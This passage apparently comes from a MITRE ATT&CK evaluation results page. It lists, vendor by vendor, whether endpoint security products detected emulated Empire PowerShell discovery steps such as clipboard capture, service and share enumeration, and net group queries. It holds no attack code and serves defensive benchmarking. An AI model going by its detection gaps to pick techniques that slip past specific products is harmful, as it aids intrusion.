Telemetry showed the full contents of the executed Invoke-WinEnum PowerShell function, which includes enumeration of interesting files. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
GoSecure
None
No detection capability demonstrated for this procedure. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2]
McAfee
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4]
Microsoft
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5]
Palo Alto Networks
Enrichment
The capability enriched powershell.exe executing with command-line arguments as suspicious and the correct ATT&CK Technique (File and Directory Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9]
RSA
None
No detection capability demonstrated for this procedure. [1] [2]
SentinelOne
None
No detection capability demonstrated for this procedure. [1] [2]
Carbon Black
None
No detection capability demonstrated for this procedure.
CrowdStrike
None
No detection capability demonstrated for this procedure, though telemetry showed execution of an encoded PowerShell command and OverWatch alerted on it as suspicious. The PowerShell decoded to Windows.Clipboard(...) outside of the capability, which indicated clipboard interaction, but this was not counted as a detection because it was external to the capability. [1] [2] [3]
Cybereason
Telemetry (Tainted)
Telemetry showed the decoded powershell.exe function to gather clipboard data. The telemetry was tainted by a parent PowerShell alert.. [1]
Endgame
Telemetry (Tainted)
Telemetry showed the creation of a PowerShell sub-process and decoded the command within the capability to show Windows.Clipboard (tainted by parent PowerShell alerts). Though it does not count as part of the detection, the Interactive Shell could also be used to analyze the PowerShell execution and WinEnum Clipboard Contents was observed. Interactive Shell was not by itself considered telemetry, but the analyst can retrieve additional Windows Logs to enhance baseline Endgame functionality. [1] [2]
FireEye
Indicator of Compromise (Delayed)
The Managed Defense Report indicated an Indicator of Compromise detection occurred because it identified that the attacker executed the Windows Clipboard capability in Empire. The capability separately showed a PowerShell Execution (Weak Signal) alert containing the encoded PowerShell command. This command could be decoded, but this was not counted as a separate detection because it was external to the capability. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3]
F-Secure
Telemetry
Telemetry showed the full contents of the executed Invoke-WinEnum PowerShell function, which includes enumeration of clipboard contents. [1] [2]
Indicator of Compromise
An Indicator of Compromise alert was generated for PowerShell Empire accessing the clipboard. [1] [2]
GoSecure
None
No detection capability demonstrated for this procedure. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details.
McAfee
None
No detection capability demonstrated for this procedure, though telemetry showed execution of an encoded PowerShell command. The PowerShell decoded to Windows.Clipboard(...) outside of the capability, which indicated clipboard interaction, but this was not counted as a detection because it was external to the capability. [1]
Microsoft
None
No detection capability demonstrated for this procedure.
Palo Alto Networks
Enrichment
The capability enriched powershell.exe executing with command-line arguments with the correct ATT&CK Technique (Clipboard Data). [1]
RSA
None
No detection capability demonstrated for this procedure.
SentinelOne
None
No detection capability demonstrated for this procedure. PowerShell telemetry showed execution of an encoded command and the script was decoded to Windows.Clipboard(...) outside of the capability, but this was not counted as a detection because it was external to the capability.
Carbon Black
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4]
CrowdStrike
Telemetry
Telemetry from decoded PowerShell (within the capability) showed the Get-Sysinfo function. [1] [2] [3] [4] [5] [6] [7] [8]
Cybereason
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4]
Endgame
None
No detection capability demonstrated for this procedure, though the Interactive Shell was used to analyze the PowerShell execution and WinEnum Get-SysInfo was observed. Interactive Shell was not by itself considered telemetry, but the analyst can retrieve additional Windows Logs to enhance baseline Endgame functionality. [1] [2] [3] [4] [5] [6] [7]
FireEye
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5] [6]
F-Secure
Telemetry
Telemetry showed the full contents of the executed Invoke-WinEnum PowerShell function, which includes enumeration of system information. [1] [2] [3] [4] [5] [6] [7] [8]
GoSecure
None
No detection capability demonstrated for this procedure. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2]
McAfee
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4]
Microsoft
Telemetry
Telemetry showed invocation of the PowerShell cmdlet Get-SysInfo. [1] [2] [3] [4] [5] [6] [7]
Palo Alto Networks
Indicator of Compromise
An Indicator of Compromise alert was generated identifying suspicious PowerShell strings as Empire SysImfo. [1] [2] [3] [4] [5] [6] [7]
RSA
None
No detection capability demonstrated for this procedure. [1] [2]
SentinelOne
Telemetry (Tainted)
Telemetry showed powershell.exe executing WMI queries that indicated operating system information was queried. The telemetry was tainted by the alert generated during initial compromise because it was associated with the same story (Group ID). [1] [2] [3] [4]
Carbon Black
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4]
CrowdStrike
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5] [6] [7] [8]
Cybereason
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4]
Endgame
None
No detection capability demonstrated for this procedure, though the Interactive Shell was used to analyze the PowerShell execution and WinEnum Windows Last Updated was observed. Interactive Shell was not by itself considered telemetry, but the analyst can retrieve additional Windows Logs to enhance baseline Endgame functionality. [1] [2] [3] [4] [5] [6] [7]
FireEye
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5] [6]
F-Secure
Telemetry
Telemetry showed the full contents of the executed Invoke-WinEnum PowerShell function, which includes enumeration of Windows update information. [1] [2] [3] [4] [5] [6] [7] [8]
GoSecure
None
No detection capability demonstrated for this procedure. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2]
McAfee
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4]
Microsoft
Telemetry
Telemetry showed invocation of the PowerShell cmdlet Get-HotFix. [1] [2] [3] [4] [5] [6] [7]
Palo Alto Networks
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5] [6] [7]
RSA
None
No detection capability demonstrated for this procedure. [1] [2]
SentinelOne
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4]
Carbon Black
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5] [6] [7] [8]
CrowdStrike
Telemetry
Telemetry from decoded PowerShell (within the capability) showed the Get-Sysinfo function. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Cybereason
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5]
Endgame
None
No detection capability demonstrated for this procedure, though the Interactive Shell was used to analyze the PowerShell execution and WinEnum Get-SysInfo was observed. Interactive Shell was not by itself considered telemetry, but the analyst can retrieve additional Windows Logs to enhance baseline Endgame functionality. [1] [2] [3] [4] [5] [6] [7] [8] [9]
FireEye
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
F-Secure
Telemetry
Telemetry showed the full contents of the executed Invoke-WinEnum PowerShell function, which includes enumeration of system information via a Registry query. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
GoSecure
None
No detection capability demonstrated for this procedure. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2] [3] [4] [5]
McAfee
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Microsoft
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5] [6] [7] [8]
Palo Alto Networks
Enrichment (Tainted)
The capability enriched the enumeration of system information via a Registry query as suspicious. The data was tainted by a parent alert on wscript.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
Indicator of Compromise
An Indicator of Compromise alert was generated identifying suspicious PowerShell strings as Empire SysImfo. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
RSA
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4]
SentinelOne
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4]
Carbon Black
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
CrowdStrike
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
Cybereason
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Endgame
None
No detection capability demonstrated for this procedure, though the Interactive Shell was used to analyze the PowerShell execution and WinEnum Services was observed. Interactive Shell was not by itself considered telemetry, but the analyst can retrieve additional Windows Logs to enhance baseline Endgame functionality. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
FireEye
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
F-Secure
Telemetry
Telemetry showed the full contents of the executed Invoke-WinEnum PowerShell function, which includes enumeration of services. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
GoSecure
None
No detection capability demonstrated for this procedure. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2] [3] [4] [5] [6]
McAfee
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
Microsoft
Telemetry
Telemetry showed invocation of the PowerShell cmdlet Get-Service. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
Palo Alto Networks
Enrichment
The capability enriched powershell.exe executing with command-line arguments with the correct ATT&CK Technique (System Service Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15]
RSA
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5] [6]
SentinelOne
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5] [6] [7]
Carbon Black
None
No detection capability demonstrated for this procedure.
CrowdStrike
None
No detection capability demonstrated for this procedure.
Cybereason
None
No detection capability demonstrated for this procedure.
Endgame
None
No detection capability demonstrated for this procedure, though the Interactive Shell was used to analyze the PowerShell execution and WinEnum Available Shares was observed. Interactive Shell was not by itself considered telemetry, but the analyst can retrieve additional Windows Logs to enhance baseline Endgame functionality. [1] [2]
FireEye
None
No detection capability demonstrated for this procedure.
F-Secure
Telemetry
Telemetry showed the full contents of the executed Invoke-WinEnum PowerShell function, which includes enumeration of available shares. [1] [2]
GoSecure
None
No detection capability demonstrated for this procedure. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details.
McAfee
None
No detection capability demonstrated for this procedure.
Microsoft
None
No detection capability demonstrated for this procedure.
Palo Alto Networks
Enrichment
The capability enriched powershell.exe executing with command-line arguments with the correct ATT&CK Technique (Network Share Discovery). [1] [2]
RSA
None
No detection capability demonstrated for this procedure.
SentinelOne
None
No detection capability demonstrated for this procedure. [1] [2]
Carbon Black
None
No detection capability demonstrated for this procedure.
CrowdStrike
None
No detection capability demonstrated for this procedure.
Cybereason
None
No detection capability demonstrated for this procedure.
Endgame
None
No detection capability demonstrated for this procedure, though the Interactive Shell was used to analyze the PowerShell execution and WinEnum Mapped Network Drives was observed. Interactive Shell was not by itself considered telemetry, but the analyst can retrieve additional Windows Logs to enhance baseline Endgame functionality. [1] [2]
FireEye
None
No detection capability demonstrated for this procedure.
F-Secure
Telemetry
Telemetry showed the full contents of the executed Invoke-WinEnum PowerShell function, which includes enumeration of mapped network drives. [1] [2]
GoSecure
None
No detection capability demonstrated for this procedure. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details.
McAfee
None
No detection capability demonstrated for this procedure.
Microsoft
None
No detection capability demonstrated for this procedure.
Palo Alto Networks
Enrichment
The capability enriched powershell.exe executing with command-line arguments with the correct ATT&CK Technique (Network Share Discovery). [1] [2]
RSA
None
No detection capability demonstrated for this procedure.
SentinelOne
Telemetry (Tainted)
Telemetry showed powershell.exe executing WMI queries that indicated logical disk information was queried. The telemetry was tainted by the alert generated during initial compromise because it was associated with the same story (Group ID). [1] [2]
Carbon Black
None
No detection capability demonstrated for this procedure.
CrowdStrike
None
No detection capability demonstrated for this procedure.
Cybereason
None
No detection capability demonstrated for this procedure.
Endgame
None
No detection capability demonstrated for this procedure, though the Interactive Shell was used to analyze the PowerShell execution and WinEnum AV Solution was observed. Interactive Shell was not by itself considered telemetry, but the analyst can retrieve additional Windows Logs to enhance baseline Endgame functionality. [1] [2]
FireEye
None
No detection capability demonstrated for this procedure.
F-Secure
Telemetry
Telemetry showed the full contents of the executed Invoke-WinEnum PowerShell function, which includes enumeration of AV solutions. [1] [2]
GoSecure
None
No detection capability demonstrated for this procedure. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details.
McAfee
None
No detection capability demonstrated for this procedure.
Microsoft
None
No detection capability demonstrated for this procedure.
Palo Alto Networks
Telemetry
Telemetry showed an event log for the WMI query of the system AV products. [1] [2]
RSA
None
No detection capability demonstrated for this procedure.
SentinelOne
Enrichment (Tainted)
The capability enriched powershell.exe activity with the action \"attempted to find other installed security software.\" The enrichment was tainted by the alert generated during initial compromise because it was associated with the same story (Group ID). [1] [2]
Telemetry (Tainted)
Telemetry showed powershell.exe executing WMI queries that indicated antivirus product information was queried. The telemetry was tainted by the alert generated during initial compromise because it was associated with the same story (Group ID). [1] [2]
Carbon Black
None
No detection capability demonstrated for this procedure.
CrowdStrike
None
No detection capability demonstrated for this procedure.
Cybereason
None
No detection capability demonstrated for this procedure.
Endgame
None
No detection capability demonstrated for this procedure, though the Interactive Shell was used to analyze the PowerShell execution and WinEnum Firewall Rules was observed. Interactive Shell was not by itself considered telemetry, but the analyst can retrieve additional Windows Logs to enhance baseline Endgame functionality. [1] [2]
FireEye
None
No detection capability demonstrated for this procedure.
F-Secure
Telemetry
Telemetry showed the full contents of the executed Invoke-WinEnum PowerShell function, which includes enumeration of firewall rules. [1] [2]
GoSecure
None
No detection capability demonstrated for this procedure. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details.
McAfee
None
No detection capability demonstrated for this procedure.
Microsoft
None
No detection capability demonstrated for this procedure.
Palo Alto Networks
Enrichment
The capability enriched powershell.exe executing with command-line arguments with the correct ATT&CK Technique (Security Software Discovery). [1] [2]
RSA
None
No detection capability demonstrated for this procedure.
SentinelOne
None
No detection capability demonstrated for this procedure. [1] [2]
Carbon Black
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5] [6] [7] [8] [9]
CrowdStrike
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
Cybereason
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5] [6] [7] [8]
Endgame
None
No detection capability demonstrated for this procedure, though the Interactive Shell was used to analyze the PowerShell execution and WinEnum Get-NetInfo-Network Adapters was observed. Interactive Shell was not by itself considered telemetry, but the analyst can retrieve additional Windows Logs to enhance baseline Endgame functionality. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
FireEye
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
F-Secure
Telemetry
Telemetry showed the full contents of the executed Invoke-WinEnum PowerShell function, which includes enumeration of network adapters. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
Enrichment
The capability enriched powershell.exe making a WMI query with a tag identifying the command as WMI enumerating adapters. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
GoSecure
None
No detection capability demonstrated for this procedure. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2] [3] [4] [5]
McAfee
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Microsoft
Telemetry
Telemetry showed invocation of the PowerShell cmdlet Get-NetInfo. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15]
Palo Alto Networks
Indicator of Compromise
An Indicator of Compromise alert was generated identifying suspicious PowerShell strings as Empire NetInfo. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15]
RSA
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5]
SentinelOne
Telemetry (Tainted)
Telemetry showed powershell.exe executing WMI queries that indicated network adapter and configuration information was queried. The telemetry was tainted by the alert generated during initial compromise because it was associated with the same story (Group ID). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Carbon Black
Telemetry
Telemetry within the process tree showed netstat.exe executing with command-line arguments. [1] [2] [3] [4] [5] [6] [7]
Enrichment
The capability enriched netstat.exe with the correct ATT&CK Technique (System Network Connections Discovery). [1] [2] [3] [4] [5] [6] [7]
CrowdStrike
Telemetry (Tainted)
Telemetry showed powershell.exe executing netstat.exe with command-line arguments. The process tree view showed netstat.exe as tainted by a previous powershell.exe detection. [1] [2] [3] [4] [5] [6] [7]
Cybereason
Enrichment (Tainted)
The capability enriched netstat.exe executing as Reconnaissance and the correct ATT&CK Technique (System Network Connections Discovery). The data was tainted by a parent PowerShell alert. [1] [2] [3] [4] [5] [6]
Telemetry
Telemetry showed netstat.exe executing with command-line arguments. The telemetry behind each enrichment is separately available in the capability. This is counted as a separate detection because the functionality was showed to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1] [2] [3] [4] [5] [6]
Endgame
Enrichment (Delayed, Tainted)
The capability enriched netstat.exe with the correct ATT&CK Technique (T1049 - System Network Connections Discovery) and Tactic (Discovery). The enrichment was tainted by parent PowerShell alerts. Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Telemetry (Tainted)
An event tree from the suspicious PowerShell process showed a netstat subprocess that was created by WinEnum (tainted by parent PowerShell alerts). Though it does not count as part of the detection, the Interactive Shell could also be used to analyze the PowerShell execution and WinEnum Get-NetInfo-Network Adapters was observed. Interactive Shell was not by itself considered telemetry, but the analyst can retrieve additional Windows Logs to enhance baseline Endgame functionality. Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5] [6] [7] [8] [9]
FireEye
General Behavior (Delayed)
The Managed Defense Report indicated a General Behavior occurred because it identified netstat.exe as a reconnaissance command used. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Enrichment
The capability enriched netstat.exe with an alert for Netstat Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1049 - System Network Connection Discovery) and Tactic (Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9]
F-Secure
Telemetry
Telemetry showed the full contents of the executed Invoke-WinEnum PowerShell function, which includes enumeration of established network connections. [1] [2] [3] [4] [5] [6]
GoSecure
None
No detection capability demonstrated for this procedure. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2] [3]
McAfee
Telemetry (Tainted)
Telemetry showed powershell.exe executing netstat.exe. The telemetry was tainted by a trace detection on wscript.exe. [1] [2] [3] [4] [5] [6]
Microsoft
General Behavior (Delayed)
A delayed General Behavior alert was generated for "Suspicious sequence of exploration activities". Alert is based on the correlation of a chain of related behaviors across multiple steps. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
Telemetry (Tainted)
Telemetry showed invocation of the PowerShell cmdlet Get-NetInfo and subsequent execution of netstat.exe with command-line arguments from powershell.exe. The telemetry was tainted by a prior suspicious PowerShell cmdlet alert. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
Palo Alto Networks
Enrichment
The capability enriched powershell.exe executing with command-line arguments with the correct ATT&CK Technique (System Network Connections Discovery). [1] [2] [3] [4] [5]
RSA
Telemetry
Telemetry showed powershell.exe executing netstat.exe with command-line arguments. [1] [2] [3]
SentinelOne
Telemetry (Tainted)
Telemetry showed powershell.exe executing netstat.exe with command-line arguments. The telemetry was tainted by the alert generated during initial compromise because it was associated with the same story (Group ID). [1] [2] [3] [4]
Carbon Black
Telemetry
Telemetry within the process tree showed powershell.exe executing net.exe with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
Enrichment
The capability enriched net.exe with the correct ATT&CK Technique (T1069 - Permission Groups Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
CrowdStrike
Telemetry (Tainted)
Telemetry showed powershell.exe executing net.exe with command-line arguments. The process tree view showed net.exe as tainted by a previous powershell.exe detection. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
Enrichment (Tainted)
The capability enriched net.exe with a related ATT&CK Technique (Account Discovery) and the correct Tactic (Discovery). The process tree view showed net.exe as tainted by a previous powershell.exe detection. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
General Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior was observed because net group was part of additional malicious discovery performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
Cybereason
General Behavior (Tainted)
A General Behavior alert was generated for net.exe conducting suspicious activity related to Discovery/Privilege Escalation as well as being a descendant of a suspicious process. The alert was also tagged with the correct ATT&CK Tactic (Discovery) and Technique (Permission Groups Discovery). The alert was tainted by a parent PowerShell alert. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
Telemetry
Telemetry showed net.exe executing with command-line arguments. For most alerts in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was showed to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
Endgame
Telemetry (Tainted)
Telemetry showed net.exe executing with command-line arguments (tainted by parent PowerShell alerts). Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
Enrichment (Tainted)
An alert for Enumeration of Administrator Account provided enrichment to the net group command (tainted by parent PowerShell alerts). The alert was also tagged with the correct ATT&CK Technique (T1069 - Permission Groups Discovery) and Tactic (Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
Enrichment (Delayed, Tainted)
The capability enriched net.exe with the correct ATT&CK Technique (T1069 - Permission Groups Discovery) and Tactic (Discovery). The enrichment was tainted by parent PowerShell alerts. Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
FireEye
Enrichment
The capability enriched net.exe with an alert for Net Group Command Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1069 - Permission Groups Discovery) and Tactic (Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
General Behavior (Delayed)
The Managed Defense Report indicated a General Behavior occurred because it identified net.exe as a reconnaissance command used. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
F-Secure
General Behavior
A General Behavior alert was generated showing that a spawned process (net.exe) has been tagged for monitoring because its parent process has a detection (powershell.exe). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
Telemetry
Telemetry showed powershell.exe executing net.exe with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
GoSecure
Enrichment (Configuration Change, Tainted)
The capability showed powershell.exe executing net.exe with command-line arguments and enriched the command with the conditions Net Domain Admins Reconnaissance Command and Net Group Reconnaissance Command. The enrichment was tainted by the parent Script File Created alert. The condition contributing to Enrichment was added to the capability's detection after the start of the evaluation, so the detection is identified as a configuration change. See Configuration page for details. [1] [2] [3] [4] [5] [6]
McAfee
Enrichment
The capability enriched net.exe with the correct ATT&CK Tactic (Discovery) and Technique (Permissions Group Discovery) and a suspicious indicator that the net utility was used to obtain information of user groups. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Enrichment
The capability enriched net.exe with the correct ATT&CK Tactic (Discovery) and Technique (Permissions Group Discovery) and a suspicious indicator that the net utility was used to obtain information of domain admins. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Telemetry (Tainted)
Telemetry showed powershell.exe executing net.exe. The telemetry was tainted by a trace detection on wscript.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Microsoft
General Behavior (Delayed)
A delayed General Behavior alert was generated for "Suspicious sequence of exploration activities". Alert is based on the correlation of a chain of related behaviors across multiple steps. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
Telemetry (Tainted)
Telemetry showed the execution sequence for powershell.exe executing net.exe with command-line arguments. The telemetry was tainted by a prior suspicious PowerShell cmdlet alert. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
Palo Alto Networks
Enrichment
The capability enriched net.exe executing with command-line arguments with the correct ATT&CK Technique (Permission Groups Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
Enrichment (Tainted)
The capability enriched the execution of net.exe and net1.exe as the possible enumeration of administrator groups. The data was tainted by a parent alert on wscript.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
Enrichment (Tainted)
The capability enriched the execution of net.exe and net1.exe as an enumeration command. The data was tainted by a parent alert on wscript.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
Telemetry (Tainted)
Telemetry showed powershell.exe executing net with command-line arguments. The telemetry was tainted by a parent alert on wscript.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
RSA
Telemetry
Telemetry showed powershell.exe executing net.exe with command-line arguments. [1] [2] [3] [4] [5] [6]
SentinelOne
Telemetry (Tainted)
Telemetry showed powershell.exe executing net.exe with command-line arguments. The telemetry was tainted by the alert generated during initial compromise because it was associated with the same story (Group ID). [1] [2] [3] [4] [5]
Carbon Black
Enrichment
The capability enriched net.exe with the correct ATT&CK Technique (T1069 - Permission Groups Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
Telemetry
Telemetry within the process tree showed powershell.exe executing net.exe with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
CrowdStrike
Telemetry (Tainted)
Telemetry showed powershell.exe executing net.exe with command-line arguments. The process tree view showed net.exe as tainted by a previous powershell.exe detection. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
General Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior was observed because net localgroup was part of additional malicious discovery performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
Cybereason
Telemetry
Telemetry showed net.exe executing with command-line arguments. For most alerts in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was showed to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
General Behavior (Tainted)
A General Behavior alert was generated for net.exe conducting suspicious activity related to Discovery/Privilege Escalation as well as being a descendant of a suspicious process. The alert was also tagged with the correct ATT&CK Tactic (Discovery) and Technique (Permission Groups Discovery). The alert was tainted by a parent PowerShell alert. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
Endgame
Enrichment (Delayed, Tainted)
The capability enriched net.exe with the correct ATT&CK Technique (T1069 - Permission Groups Discovery) and Tactic (Discovery). The enrichment was tainted by parent PowerShell alerts. Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
Telemetry (Tainted)
Telemetry showed net.exe executing with command-line arguments (tainted by parent PowerShell alerts). Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
Enrichment (Tainted)
An alert for Enumeration of Administrator Account provided enrichment to the net group command (tainted by parent PowerShell alerts). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
FireEye
Enrichment
The capability enriched net.exe with an alert for Net Group Command Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1069 - Permission Groups Discovery) and Tactic (Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
General Behavior (Delayed)
The Managed Defense Report indicated a General Behavior occurred because it identified net.exe as a reconnaissance command used. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
F-Secure
General Behavior
A General Behavior alert was generated showing that a spawned process (net1.exe) has been tagged for monitoring because its parent process has a detection (powershell.exe). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
Telemetry
